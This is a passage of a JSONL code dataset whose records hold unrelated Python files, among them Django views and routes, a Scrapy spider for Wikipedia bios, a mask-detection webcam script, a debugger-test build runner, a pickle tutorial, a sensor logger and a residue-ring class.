axes[1].set_title('All citizens clusters (including science team)')\n\n    # gold stuff\n    gold_star_plotter(p4img, axes[2], blotches=False, kind='fans')\n    axes[2].set_title('Science team markings')\n    DBScanner(golddata, 'fan', ax=axes[3], min_samples=2, eps=11,\n              linestyle='--')\n    axes[3].set_title('Science team clusters')\n\n    plt.show()\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"planet4/clustering.py","file_name":"clustering.py","file_ext":"py","file_size_in_byte":7683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"560016960","text":"from rest_framework.routers import DefaultRouter\nfrom django.conf.urls.static import static\n\nfrom django.urls import include, path\nfrom django.conf import settings\nfrom rest_framework_simplejwt.views import (\n    TokenVerifyView\n)\nfrom . import views\n\nrouter = DefaultRouter(trailing_slash=False)\nrouter.register('products', views.ProductViewSet, base_name='products')\nrouter.register('orders', views.OrderViewSet, base_name='orders')\nrouter.register('onlineOrders', views.OnlineOrderViewSet, base_name='online_orders')\nrouter.register('vouchers', views.VoucherViewSet, base_name='vouchers')\nrouter.register('UUID', views.UUIDView, base_name='uuids')\nrouter.register('productlist', views.ProductVoucherViewSet, base_name='products_vouchers')\n\n\nurlpatterns = [\n    path('login/', views.LoginAPI.as_view(), name='api_login'),\n    path('register/', views.RegisterAPI.as_view(), name='api_register'),\n    path('logout/', views.LogoutAPI, name='api_logout'),\n    path('me/', views.MeView.as_view(), name='api_me'),\n    path('categories/', views.CategoryView.as_view(), name='api_category'),\n    path('orderStatus/', views.OrderStatusView.as_view(), name='api_status'),\n    path('onlineOrderStatus/', views.OnlineOrderStatusView.as_view(), name='api_status_order_voucher'),\n    path('productStatuses/', views.ProductStatusView.as_view(), name='api_status_product'),\n    path('suppliers/', views.SupplierView.as_view(), name='api_suppliers'),\n    path('token/', views.TokenUserView.as_view(), name='token_obtain_pair'),\n    path('token/verify', TokenVerifyView.as_view(), name='token_verify'),\n    path('onlineOrderRef/', views.OnlineOrderRefView.as_view(), name='online_order_ref'),\n    path('orderRef/', views.OrderRefView.as_view(), name='order_ref'),\n    path('redeem/', views.RedeemView.as_view(), name='redeem_order'),\n    path('onlineOrderTx/', views.UsedOnlineOrderView.as_view(), name='change_online_order_status')\n]\nurlpatterns += router.urls\n\n","sub_path":"demo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"321833453","text":"import cv2\nimport numpy as np\nimport tflite_runtime.interpreter as tflite\nimport urllib3\nimport time\n\n\ndef requestToThingSpeak():\n    # upload value to thingSpeak\n    url = \"https://api.thingspeak.com/update?api_key=\"\n    key = \"your key\"\n    val = f\"&field1={noMaskedNum}\"\n    r = urllib3.PoolManager().request(\"GET\", url + key + val)\n    print(r.status)\n\n\n# init\nMODEL_PATH = \"myModel/model.tflite\"\nFACE_CASCADE_PATH = \"myModel/haarcascade_frontalface_default.xml\"\n\n# load model\ninterpreter = tflite.Interpreter(model_path=MODEL_PATH)\ninterpreter.allocate_tensors()\n# set label\nlabel = ['mask', 'face']\n# load face roi detector\nface_cascade = cv2.CascadeClassifier(FACE_CASCADE_PATH)\n# Capture video\ncap = cv2.VideoCapture(0)\n\n# first upload value\nnoMaskedNum = 0\n# 
requestToThingSpeak()\ns = time.time()\n\nwhile True:\n # for each frame\n ret, frame = cap.read()\n # fram to gray color\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n # detect face roi\n faces = face_cascade.detectMultiScale(gray, 1.3, 4)\n\n # reset\n noMaskedNum = 0\n\n # detect all faces is masked or nomasked\n for (fx, fy, fw, fh) in faces:\n # for each face\n # crop face\n crop = frame[fy:fy+fh, fx:fx+fh]\n crop = cv2.resize(crop, (128, 128))\n crop = np.reshape(crop, [1, 128, 128, 3]) / 255.0\n crop = crop.astype('float32')\n # put crop to model\n interpreter.set_tensor(interpreter.get_input_details()[0]['index'], crop)\n # error msg\n interpreter.invoke()\n # get result of model\n output = interpreter.get_tensor(interpreter.get_output_details()[0]['index'])[0]\n # print ans\n print(output, \" \", np.argmax(output), \" \", label[np.argmax(output)])\n # count nomasked\n if np.argmax(output) == 1:\n noMaskedNum += 1\n # draw face roi and set text of model's result\n cv2.rectangle(frame, (fx, fy), (fx + fw, fy + fh), (255, 0, 0), 2)\n cv2.putText(frame, label[np.argmax(output)], (fx, fy), cv2.FONT_HERSHEY_SIMPLEX, 1, (200, 255, 255), 2, cv2.LINE_AA)\n\n # upload value delay 15s (thingSpeak default)\n # !!! IMPORTANT !!!\n # It will take 0.88 ~ 1s time to upload\n # that mean the screen will sleep when it upload.\n # It can be solved by using threading\n # but sometime will encounter the value init\n # so will got incorrect value.\n # In fact, I was lazy to solve it XD\n # !!! IMPORTANT !!!\n\n # c = time.time()\n # if c - s > 15.5:\n # requestToThingSpeak()\n # s = c\n\n # show frame\n cv2.imshow('img', frame)\n # exit()\n if cv2.waitKey(1) & 0xFF == 27:\n break\n\ncap.release()\ncv2.destroyAllWindows()\n","sub_path":"detectMask.py","file_name":"detectMask.py","file_ext":"py","file_size_in_byte":2690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"539306666","text":"#! 
python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jan 23 06:26:28 2021\n\n@author: sconcannon\n\nfollowing ch6 of Data Visualization with Python and Javascript\ndownloads bios and images of Nobel prize winners, using Scrapy\n\"\"\"\nimport scrapy\nimport re\n\nBASE_URL = 'https://en.wikipedia.org'\n\nclass NWinnerBio(scrapy.Item):\n link = scrapy.Field()\n name = scrapy.Field()\n mini_bio = scrapy.Field()\n image_urls = scrapy.Field()\n bio_image = scrapy.Field()\n images = scrapy.Field()\n \nclass NWinnerSpiderBio(scrapy.Spider):\n \"\"\" Scrapes the country and link text of the Nobel winners \"\"\"\n name = 'nwinners_minibio'\n allowed_domains = ['en.wikipedia.org']\n start_urls = [\"https://en.wikipedia.org/wiki/List_of_Nobel_laureates_by_country\"]\n \n def parse(self, response):\n filename = response.url.split('/')[-1]\n h3s = response.xpath('//h3')\n \n for h3 in h3s:\n country = h3.xpath('span[@class=\"mw-headline\"]/text()').extract()\n if country:\n winners = h3.xpath('following-sibling::ol[1]')\n for w in winners.xpath('li'):\n wdata = {}\n wdata['link'] = BASE_URL + w.xpath('a/@href').extract()[0]\n # Process the winner's bio page with the get_mini_bio method\n request = scrapy.Request(\n wdata['link'],\n callback=self.get_mini_bio)\n request.meta['item'] = NWinnerBio(**wdata)\n yield request\n \n def get_mini_bio(self, response):\n \"\"\" Get the winner's bio-text and photo \"\"\"\n \n BASE_URL_ESCAPED = 'https:\\/\\/en.wikipedia.org'\n item = response.meta['item']\n item['image_urls'] = []\n img_src = response.xpath('//table[contains(@class, \"infobox\")]//img/@src')\n if img_src:\n item['image_urls'] = ['https:' + img_src[0].extract()]\n \n paras = response.xpath('//div[@class=\"mw-parser-output\"]/*')\n mini_bio = ''\n\n for x in range(0,len(paras)):\n if paras[x].xpath('@id').extract() == ['toc']:\n break # stop after the intro \n if not paras[x].xpath('@class'): # bio intro paras have no classes\n mini_bio += paras[x].extract()\n \n # correct for wiki-links\n mini_bio = mini_bio.replace('href=\"/wiki', 'href=\"' + BASE_URL + '/wiki')\n mini_bio = mini_bio.replace('href=\"#', item['link'] + '#')\n item['mini_bio'] = mini_bio\n yield item","sub_path":"nobel_winners/spiders/nwinners_minibio_spider.py","file_name":"nwinners_minibio_spider.py","file_ext":"py","file_size_in_byte":2579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"555426996","text":"import json\r\nimport string, random\r\nimport datetime\r\n\r\nfrom django.conf import settings\r\n\r\nfrom rest_framework.views import APIView\r\nfrom rest_framework.generics import ListAPIView\r\nfrom rest_framework.response import Response\r\nfrom rest_framework.reverse import reverse\r\nfrom rest_framework import status\r\n\r\nfrom reputation.models import Visitor, Visit\r\nfrom threat import Reputation\r\nfrom .serializers import DetailSerializer, VisitorSerializer\r\n\r\n\r\ndef random_string(length):\r\n return \"\".join([\r\n random.choice(string.digits) \\\r\n for _ in range(length)])\r\n\r\ndef year_from_now():\r\n return datetime.datetime.now() + datetime.timedelta(days=365)\r\n\r\n\r\nclass APIRoot(APIView):\r\n def get(self, request):\r\n return Response({\r\n 'IP Details': reverse(\r\n 'threat_details',\r\n kwargs={'ip_address': '1.2.3.4'},\r\n request=request),\r\n })\r\n\r\n\r\nclass IPDetailsView(APIView):\r\n \"\"\"\r\n IPDetail resource.\r\n \"\"\"\r\n def get(self, request, *args, **kwargs):\r\n \"\"\"\r\n Return details for a given ip address.\r\n 
---\r\n serializer: reputation.serializers.DetailSerializer\r\n \"\"\"\r\n ip_address = kwargs.get('ip_address')\r\n endpoint = reverse('threat_details',\r\n kwargs={'ip_address': kwargs.get('ip_address')})\r\n\r\n details = Reputation.get_details(ip_address)\r\n detail_data = {}\r\n if not details is None:\r\n if details == u'':\r\n detail_data.update({'address': ip_address})\r\n else:\r\n detail_data = json.loads(details)\r\n result = DetailSerializer(data=detail_data)\r\n result.is_valid()\r\n \r\n response = Response(result.data, status=status.HTTP_200_OK)\r\n tracking_cookie = request.COOKIES.get(settings.TRACKING_COOKIE)\r\n if not tracking_cookie:\r\n tracking_cookie = random_string(12)\r\n response.set_cookie(\r\n settings.TRACKING_COOKIE,\r\n tracking_cookie,\r\n expires=year_from_now())\r\n Visit.objects.create_visit(\r\n tracking_cookie, ip_address, endpoint)\r\n return response\r\n\r\n\r\nclass VisitorListView(ListAPIView):\r\n \"\"\"\r\n Api traffic details.\r\n \"\"\"\r\n model = Visitor\r\n queryset = Visitor.objects.all().order_by('alienvaultid')\r\n serializer_class = VisitorSerializer\r\n","sub_path":"reputation/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"172566477","text":"import re\n\nfrom django.db.models import Max\nfrom django.middleware.cache import CacheMiddleware\nfrom django.utils.cache import learn_cache_key, get_max_age\n\nfrom .models import Dataset, Resource\n\n\nclass MetadataCacheMiddleware(CacheMiddleware):\n\n path_patterns = (\n re.compile(r'^/$'),\n re.compile(r'^/api/v1/datasets/'),\n re.compile(r'^/api/v1/files/')\n )\n\n def process_request(self, request):\n self.result = self.check_path_info(request.path_info)\n if self.result:\n self.update_cache()\n return super().process_request(request)\n else:\n return None\n\n def process_response(self, request, response):\n if self.result:\n # this is a limited version of process_response in UpdateCacheMiddleware\n # which does not set the headers to let the client cache the response as well\n if not self._should_update_cache(request, response):\n return response\n\n timeout = self.cache_timeout\n if timeout and response.status_code == 200:\n cache_key = learn_cache_key(request, response, timeout, self.key_prefix, cache=self.cache)\n response.add_post_render_callback(lambda r: self.cache.set(cache_key, r, timeout))\n\n return response\n\n def check_path_info(self, path_info):\n return any(pattern.search(path_info) for pattern in self.path_patterns)\n\n def update_cache(self):\n # get the cache_timestamp from the cache\n cache_timestamp = self.cache.get('timestamp')\n\n # get the latest timestamp from the datasets and resources table\n timestamp_values = [\n value for value in Dataset.objects.using('metadata').aggregate(\n Max('created'),\n Max('updated'),\n Max('published'),\n Max('archived')\n ).values() if value is not None\n ] + [\n value for value in Resource.objects.using('metadata').aggregate(\n Max('created'),\n Max('updated')\n ).values() if value is not None\n ]\n timestamp = max(timestamp_values) if timestamp_values else None\n\n # check if the timestamp is later than cache_timestamp\n if cache_timestamp is None or timestamp is None or timestamp > cache_timestamp:\n # the datasets table has changed, clear the cache and set a new timestamp\n self.cache.clear()\n self.cache.set('timestamp', timestamp, 
self.cache_timeout)\n","sub_path":"isimip_data/metadata/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"62970103","text":"# DExTer : Debugging Experience Tester\n# ~~~~~~ ~ ~~ ~ ~~\n#\n# Copyright (c) 2018 by SN Systems Ltd., Sony Interactive Entertainment Inc.\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\"\"\"Deals with the processing execution of shell or batch build scripts.\"\"\"\n\nimport os\nimport subprocess\nimport unittest\n\nfrom dex.dextIR import BuilderIR\nfrom dex.utils import Timer\nfrom dex.utils.Exceptions import BuildScriptException\n\n\ndef _quotify(text):\n if '\"' in text or ' ' not in text:\n return text\n return '\"{}\"'.format(text)\n\n\ndef _expand_text_replacements(text, source_files, compiler_options,\n linker_options, executable_file):\n\n source_files = [_quotify(f) for f in source_files]\n object_files = [\n _quotify('{}.o'.format(os.path.basename(f))) for f in source_files\n ]\n source_indexes = ['{:02d}'.format(i + 1) for i in range(len(source_files))]\n\n replacements = {}\n replacements['SOURCE_INDEXES'] = ' '.join(source_indexes)\n replacements['SOURCE_FILES'] = ' '.join(source_files)\n replacements['OBJECT_FILES'] = ' '.join(object_files)\n replacements['LINKER_OPTIONS'] = linker_options\n\n for i, _ in enumerate(source_files):\n index = source_indexes[i]\n replacements['SOURCE_FILE_{}'.format(index)] = source_files[i]\n replacements['OBJECT_FILE_{}'.format(index)] = object_files[i]\n replacements['COMPILER_OPTIONS_{}'.format(index)] = compiler_options[i]\n\n replacements['EXECUTABLE_FILE'] = executable_file\n\n try:\n return replacements, text.format(**replacements)\n except KeyError as e:\n raise BuildScriptException('could not expand variable {}.\\n'\n 'Available expansions are: {}'.format(\n e, ', '.join(\n sorted(replacements.keys()))))\n\n\ndef run_external_build_script(context, script_path, source_files,\n compiler_options, linker_options,\n executable_file):\n\n builderIR = BuilderIR(\n name=context.options.builder,\n cflags=compiler_options,\n ldflags=linker_options,\n )\n tmp_script_path = os.path.join(context.working_directory.path,\n os.path.basename(script_path))\n\n assert len(source_files) == len(compiler_options), (source_files,\n compiler_options)\n\n with open(script_path, 'r') as fp:\n text = fp.read()\n\n try:\n replacements, text = _expand_text_replacements(\n text, source_files, 
compiler_options, linker_options,\n executable_file)\n except BuildScriptException as e:\n raise BuildScriptException('{}: {}'.format(script_path, e))\n\n with open(tmp_script_path, 'w') as fp:\n fp.write(text)\n\n os.chmod(tmp_script_path, os.stat(script_path).st_mode)\n\n env = dict(os.environ)\n env.update(replacements)\n try:\n with Timer('running build script'):\n process = subprocess.Popen(\n [tmp_script_path],\n cwd=context.working_directory.path,\n env=env,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n out, err = process.communicate()\n returncode = process.returncode\n if returncode != 0:\n raise BuildScriptException(\n '{}: failed with returncode {}.\\nstdout:\\n{}\\n\\nstderr:\\n{}\\n'.\n format(script_path, returncode, out, err),\n script_error=err)\n return out.decode('utf-8'), err.decode('utf-8'), builderIR\n except OSError as e:\n raise BuildScriptException('{}: {}'.format(e.strerror, script_path))\n\n\nclass TestBuilder(unittest.TestCase):\n def test_expand_text_replacements(self):\n text = ''\n source_files = ['a.a']\n compiler_options = ['-option1 value1']\n linker_options = '-optionX valueX'\n executable_file = 'exe.exe'\n\n result = _expand_text_replacements(text, source_files,\n compiler_options, linker_options,\n executable_file)[1]\n\n self.assertEqual(result, '')\n\n text = '{SOURCE_FILES}'\n result = _expand_text_replacements(text, source_files,\n compiler_options, linker_options,\n executable_file)[1]\n self.assertEqual(result, 'a.a')\n\n text = '{SOURCE_FILE_01}'\n result = _expand_text_replacements(text, source_files,\n compiler_options, linker_options,\n executable_file)[1]\n self.assertEqual(result, 'a.a')\n\n text = '{SOURCE_FILE_02}'\n with self.assertRaises(BuildScriptException):\n _expand_text_replacements(text, source_files, compiler_options,\n linker_options, executable_file)\n\n text = '{COMPILER_OPTIONS_01}'\n result = _expand_text_replacements(text, source_files,\n compiler_options, linker_options,\n executable_file)[1]\n self.assertEqual(result, '-option1 value1')\n\n text = '{COMPILER_OPTIONS_02}'\n with self.assertRaises(BuildScriptException):\n _expand_text_replacements(text, source_files, compiler_options,\n linker_options, executable_file)\n\n text = '{EXECUTABLE_FILE}'\n result = _expand_text_replacements(text, source_files,\n compiler_options, linker_options,\n executable_file)[1]\n self.assertEqual(result, 'exe.exe')\n\n text = '{FOO}'\n with self.assertRaises(BuildScriptException):\n _expand_text_replacements(text, source_files, compiler_options,\n linker_options, executable_file)\n\n text = (\n 'xx {SOURCE_FILE_01} yy {COMPILER_OPTIONS_01} zz {EXECUTABLE_FILE}'\n )\n result = _expand_text_replacements(text, source_files,\n compiler_options, linker_options,\n executable_file)[1]\n self.assertEqual(result, 'xx a.a yy -option1 value1 zz exe.exe')\n\n source_files = ['a.a', 'b.b']\n compiler_options = ['-option1 value1', '-option2 value2']\n\n text = 'xx {SOURCE_FILES} yy'\n result = _expand_text_replacements(text, source_files,\n compiler_options, linker_options,\n executable_file)[1]\n self.assertEqual(result, 'xx a.a b.b yy')\n\n text = 'xx {SOURCE_FILE_01} yy {COMPILER_OPTIONS_01} zz'\n result = _expand_text_replacements(text, source_files,\n compiler_options, linker_options,\n executable_file)[1]\n self.assertEqual(result, 'xx a.a yy -option1 value1 zz')\n\n text = 'xx {SOURCE_FILE_01} yy {COMPILER_OPTIONS_02} zz'\n result = _expand_text_replacements(text, source_files,\n compiler_options, linker_options,\n executable_file)[1]\n 
self.assertEqual(result, 'xx a.a yy -option2 value2 zz')\n\n        text = 'xx {SOURCE_FILE_02} yy {COMPILER_OPTIONS_01} zz'\n        result = _expand_text_replacements(text, source_files,\n                                           compiler_options, linker_options,\n                                           executable_file)[1]\n        self.assertEqual(result, 'xx b.b yy -option1 value1 zz')\n\n        text = 'xx {SOURCE_FILE_02} yy {COMPILER_OPTIONS_02} zz'\n        result = _expand_text_replacements(text, source_files,\n                                           compiler_options, linker_options,\n                                           executable_file)[1]\n        self.assertEqual(result, 'xx b.b yy -option2 value2 zz')\n","sub_path":"dex/builder/Builder.py","file_name":"Builder.py","file_ext":"py","file_size_in_byte":9253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"512117209","text":"import pickle\nimport bz2\nimport multiprocessing as mp\nfrom math import cos\nimport dill\nimport pathos.multiprocessing as pmp  # distinct alias so the stdlib multiprocessing import above is not shadowed\n\n#pickle\ndogs_dict = { 'Ozzy': 3, 'Filou': 8, 'Luna': 5, 'Skippy': 10, 'Barco': 12, 'Balou': 9, 'Laika': 16 }\n\nfilename = 'dogs'\noutfile = open(filename,'wb')\n\npickle.dump(dogs_dict,outfile)\noutfile.close()\n\n#unpickle\ninfile = open(filename,'rb')\nnew_dict = pickle.load(infile)\ninfile.close()\n\nprint(new_dict)\nprint(new_dict==dogs_dict)\nprint(type(new_dict))\n\n#compress a pickle file to reduce size\nsfile = bz2.BZ2File('smallerfile', 'w')\npickle.dump(dogs_dict, sfile)\n\n##unpickle python2 objects in python 3\n#infile = open(filename,'rb')\n#new_dict = pickle.load(infile, encoding='latin1')\n\n##In case of python2 objects having numpy arrays\n#new_dict = pickle.load(infile, encoding='bytes')\n\n#multiprocessing\n'''Processes do not share memory space, so when they have to send information to each other, they use serialization, which is done using the pickle module.'''\n\np = mp.Pool(2) #amount of processors to use\np.map(cos, range(10))\nprint (p.map(cos, range(10)))\n\n#Remember that lambda functions can't be pickled. 
So if you try to apply multiprocessing to a lambda function, it will fail.\ndill.dump(lambda x: x**2, open('dillfile','wb'))\n\n'''To use multiprocessing with a lambda function, or other data types unsupported by pickle, you will have to use a fork of multiprocessing called pathos.multiprocessing'''\np = pmp.Pool(2)\nlambda_map = p.map(lambda x: 2**x, range(10))\n\nfilename = 'lambda_dump'\noutfile = open(filename,'wb')\ndill.dump(lambda_map,outfile)\noutfile.close()\n\ninfile = open(filename,'rb')\nnew_map = dill.load(infile)\ninfile.close()\n\nprint(new_map)\nprint(new_map==lambda_map)\nprint(type(new_map))\n","sub_path":"hw1/practiseCodesForHW1/pickelTest.py","file_name":"pickelTest.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"608417077","text":"import collections\ndef finddupli(array):\n    countarr=collections.Counter(array)\n    #print (countarr)\n    result=[i for i in countarr if countarr[i]>1]\n    if len(result)==0:\n        print (\"\\nThere is no Duplicates in O(n) time in the given array.\")\n        exit(0)\n    print (\"\\nDuplicates in O(n) time in the given array:\",\" \".join(map(str,result)))\n\n\narray=[1, 2, 3, 1, 3, 6, 6]\n#array=[1,2,3,4]\nprint (\"\\nGiven array:\",array)\nfinddupli(array)\n","sub_path":"arrays/q20_finddupli_orderofntime.py","file_name":"q20_finddupli_orderofntime.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"516428132","text":"from django.shortcuts import render, redirect\nfrom .models import Post\nfrom .forms import PostForm\n\n# Create your views here.\ndef post_list(request):\n    post_list = Post.objects.all()\n    return render(request, 'blog/post_list.html', {\n        'post_list':post_list\n    })\n\ndef post_detail(request, pk):\n    post = Post.objects.get(pk=pk)\n    return render(request, 'blog/post_detail.html', {\n        'post':post\n    })\n\ndef post_new(request):\n    if request.method == 'POST':\n        form = PostForm(request.POST, request.FILES)\n        if form.is_valid():\n            post = form.save()\n            return redirect('blog:post_list')\n    else:\n        form = PostForm()\n    return render(request, 'blog/post_form.html', {\n        'form':form\n    })","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"395434833","text":"import logging\nimport time\nimport RPi.GPIO as GPIO\nimport dht11\nimport datetime\n \nfrom logging.handlers import RotatingFileHandler\n\n# initialize GPIO\nGPIO.setwarnings(True)\nGPIO.setmode(GPIO.BCM)\n\n#read data using pin 4\ninstance = dht11.DHT11(pin=4)\n\n#set path and name for log files\npath = \"/home/pi/Desktop/log/dht11.log\"\n\n#create rotating log and set level\nlogger = logging.getLogger(\"Rotating Log\")\nlogger.setLevel(logging.INFO)\n\n#specify the log size and log file count. 
200 bytes will allow 3 logs per file\nhandler = RotatingFileHandler(path, maxBytes=200, backupCount=5)\nlogger.addHandler(handler)\n\n#run by default\n\ntry:\n    while True:\n        result = instance.read()\n        if result.is_valid():\n            #send output to log file\n            logger.info(\"Time \" + str(datetime.datetime.now()) + \" Temperature: %d F \" % ((result.temperature*9/5)+32) + \"Humidity: %-3.1f%%\"% (result.humidity))\n            #send output to shell\n            print(\"Time \" + str(datetime.datetime.now()) + \" Temperature: %d F \" % ((result.temperature*9/5)+32) + \"Humidity: %-3.1f%%\"% (result.humidity))\n        \n        time.sleep(1)\n\nexcept KeyboardInterrupt:\n    print(\"Cleanup\")\n    GPIO.cleanup()\n    \n    \n    \n    \n    \n","sub_path":"collect_dht11.py","file_name":"collect_dht11.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"590154681","text":"from AbstrakteRinge import *\n#from Extension.Primzahl import aks\n\n# Randomness:\n\nfrom random import randint\n\n\n\nclass GanzzahlRestklassenring(Ring):\n\n    \"\"\"Instantiable class\"\"\"\n\n\n    def __init__(self,modulus : int):\n        \n        if not isinstance(modulus,int):\n            raise RuntimeError(\"The given object is not an integer.\")\n        if modulus <= 0:\n            raise RuntimeError(\"The modulus is not positive.\")\n\n        self.modulus = modulus\n        self.null = GanzzahlRestklassenringElement(0,self)\n        self.eins = GanzzahlRestklassenringElement(1,self)\n        self.ist_endlicher_koerper = True\n        self.elements = []\n        self._frier()\n\n    def __str__(self):\n        \n        return \"Z/{0}Z\".format(self.modulus)\n    \n    \n    def __eq__(self,other):\n        \n        if not super().__eq__(other):\n            return False\n        return (self.modulus == other.modulus)\n\n\n    def element(self,a):\n        return GanzzahlRestklassenringElement(a,self)\n\n\n    def zufaellig(self):\n        return GanzzahlRestklassenringElement(randint(0,self.modulus-1),self.modulus)\n\n\n\nclass GanzzahlRestklassenringElement(RingElement):\n    \n    \"\"\"Instantiable class\"\"\"\n    \n    def __init__(self,a,n):\n        \n        if isinstance(n,int):\n            if n <= 0:\n                raise RuntimeError(\"The modulus is not positive.\")\n            self.ring = GanzzahlRestklassenring(n)\n\n        elif isinstance(n,GanzzahlRestklassenring):\n            self.ring = n\n\n        else:\n            raise RuntimeError(\"The second given object is neither an integer nor an integer residue class ring.\")\n\n        if type(a) == int:\n\n            self.wert = a % self.ring.modulus\n\n        elif type(a) == GanzzahlRestklassenringElement:\n\n            if a.ring.modulus % self.ring.modulus == 0:\n                self.wert = a.wert % self.ring.modulus\n\n            else:\n                raise RuntimeError(\"The moduli do not fit together.\")\n\n        else:\n            raise RuntimeError(\"The first given object is neither an integer nor an integer residue class ring element.\")\n\n        self._frier()\n\n\n    def drucke_element(self):\n\n        return \"[{0}]\".format(self.wert)\n\n\n\n    def __eq__(self,other):\n\n        if not super().__eq__(other):\n            return False\n        return self.wert == other.wert\n\n    \n\n    # Now the arithmetic operators are overloaded / defined\n\n    \n    def __neg__(self):\n\n        return GanzzahlRestklassenringElement(-self.wert, self.ring)\n\n\n    def __radd__(self,other):\n        \n        super().__radd__(other)\n\n        if type(other) == int:\n            return GanzzahlRestklassenringElement(self.wert+other,self.ring)\n\n        return GanzzahlRestklassenringElement(self.wert+other.wert,self.ring)\n\n    \n\n    def __rmul__(self,other):\n        \n        super().__rmul__(other)\n\n        # One factor is a:\n        # This factor is a ring element:\n        \n        a = self\n        \n        # The other factor is b\n        # The input is: 
other*self\n        # The condition is: other must either be an integer\n        # or an integer residue class ring element whose modulus\n        # is a multiple of that of a:\n        # This factor is (initially) represented as a number. \n\n        if type(other) == int:\n            b = other\n        elif (isinstance(other,GanzzahlRestklassenringElement) and \n              other.ring.modulus % self.ring.modulus == 0):\n            b = other.wert % self.ring.modulus\n        else:\n            raise RuntimeError(\"The elements cannot be multiplied.\")\n        \n        # Conversion to 2-adic notation:\n        \n        zweiadisch = zwei_adisch(b)\n\n        # Now comes double-and-add\n\n\n        c = self.ring.null\n\n        for i in range (0,len(zweiadisch)-1):\n            if zweiadisch[i] == '1':\n                c = c + a\n            c = c + c\n\n        # At the end, one more addition is needed, without multiplying.\n        \n        if (len(zweiadisch) > 0 \n            and zweiadisch[len(zweiadisch)-1] == '1'):\n            c = c + a\n\n        return c\n\n\n\n    def invers(self):\n\n        a = self.wert\n        b = self.ring.modulus\n\n        u, s = GanzzahlRestklassenringElement(1,self.ring), GanzzahlRestklassenringElement(0,self.ring)\n\n        # Very compact gcd-modulo computation\n        while b!=0:\n            q=a//b\n            a, b = b, a-q*b\n            u, s = s, u-q*s\n\n        if a != 1:\n            raise InvertierungsFehler(self)\n\n        return u\n\n","sub_path":"tocas/GanzzahlRestklassenringe.py","file_name":"GanzzahlRestklassenringe.py","file_ext":"py","file_size_in_byte":4527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"38133033","text":"from django_mako_plus.controller.router import get_renderer\nfrom django_mako_plus.controller import view_function\nfrom django.http import HttpResponse, HttpResponseRedirect, Http404\nimport datetime\nfrom django import forms\nimport homepage.models as hmod\n\ntemplater = get_renderer('manager')\n\n'''\n    users: CRUD functions for users\n\n'''\n\n@view_function\ndef process_request(request):\n    '''\n    process_request: Return list of users, sorted by last name\n    '''\n    params = {}\n\n    # get list of users, sorted by last name\n    users = hmod.User.objects.all().order_by('last_name')\n\n    # pass list to template\n    params['users'] = users\n\n    return templater.render_to_response(request, 'users.html', params)\n\n@view_function\ndef create(request):\n    '''\n    create: Creates empty user, sends user to edit page\n    '''\n\n    params = {}\n\n    user = hmod.User()\n    user.username = ''\n    user.last_name = ''\n    user.first_name = ''\n    user.email = ''\n    user.phone = ''\n\n    user.save()\n\n    # send user to edit page\n    return HttpResponseRedirect('/manager/users.edit/{}'.format(user.id))\n\n@view_function\ndef edit(request):\n    '''\n    edit: Sends form for editing user details\n    '''\n\n    params = {}\n\n    # try to get user\n    try:\n        user = hmod.User.objects.get(id = request.urlparams[0])\n    except hmod.User.DoesNotExist:\n        # redirect to user list page\n        return HttpResponseRedirect('/manager/users/')\n\n    # initialize event user form\n    form = UserEditForm(initial={\n        'username' : user.username,\n        'first_name': user.first_name,\n        'last_name': user.last_name,\n        'email': user.email,\n        'phone': user.phone,\n\n    })\n\n    # if POST\n    if request.method == 'POST':\n        # get form from request\n        form = UserEditForm(request.POST)\n\n        # for use in clean method\n        form.user_id = user.id\n\n        # if form is valid\n        if form.is_valid():\n\n            # edit user object\n            user.username = form.cleaned_data['username']\n            user.first_name = form.cleaned_data['first_name']\n            user.last_name = form.cleaned_data['last_name']\n            user.email = form.cleaned_data['email']\n            